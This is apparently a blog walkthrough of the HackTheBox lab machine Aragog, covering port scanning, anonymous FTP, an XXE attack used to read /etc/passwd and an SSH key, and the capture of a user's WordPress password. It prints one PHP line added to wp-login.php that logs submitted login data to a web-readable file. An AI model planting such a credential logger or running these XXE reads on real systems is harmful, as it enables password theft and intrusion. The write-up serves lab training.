Aragog is a machine on the HackTheBox.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
This article will show how to hack Aragog box and get root permission.
Before hacking Aragog box, we need to collect information. First, using nmap scan open ports.
We find there are 3 open ports.
FTP server running on the port 21.
SSH server running on the port 22.
HTTP server running on the port 80.
Then, we enumerate http, and see what can we find.
We found that there is a php file (hosts.php). We finished the initial collection, then we move to hacking.
Hack FTP Server
We know that there is a FTP server. For FTP, there are few vulnerabilities. First, let try login by anonymous.
We login by using username “ftp”, and we login successful.
We also find that there is a txt file, we download this file by using “get” command.
We “cat” the txt file, the format looks like xml, but we did not know how to use it right now.
Hack HTTP Server
Then, we move to HTTP Server, we open the website on the browser.
What did these number and “hosts” means? Let try google it, “4294967294 hosts”.
We found that it is related subnet-mask. The txt file also is about subnet-mask. So, I am assume that we can post that txt file. Now, open burp, and build our payload.
We open burp, intercept the “Get” package, and send it to repeater.
Then, we change it to “POST” method, and the post content is the txt file’s content.
We find the website gives response, and calculates the possible hosts.
As I mentioned before, the content looks like xml. So, I guess that it is XXE issue. So, Let create a payload and read /etc/passwd file.
Then, we just need to change the location to user.txt file.
Now, we are moving to hack root.txt. For hacking root.txt, we have to do privilege escalation.
We need to get a shell to do privilege escalation. As we scanned before, SSH is running on this server.
As you may know, SSH has two ways to login, one way is using password, another is using key. So, the target is the ssh key. (Because we have no permission to read shadow file)
we copy the key and use it to login.
Find WordPress – Aragog
When we go to the web directory (/var/www/html).
There is a folder, which called “dev_wiki”. We visit it on the browser.
Based on the website, we know that “Cliff” user reset the blog regularly, and it will login regularly.
So, if we can catch the WordPress Username and Password. We may can login as Cliff user or root user.
So, we edit wp-login.php file, and add following content in the file.
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);
After change the file, we just need to wait few mins. And we will find the “login.req” file.
This password is encode by URL, we use Burp decode it, and then we use this password login to root.
This box is not too difficult, I totally spent 4 hours on this box. I spent most of time on the initial step (around 3 hours). I was thinking that it was code injection issue, I tried a lot of payloads, but they did not work. After, I found it was XXE, everything is easy. The difficulty should around 5. (10 is most difficult)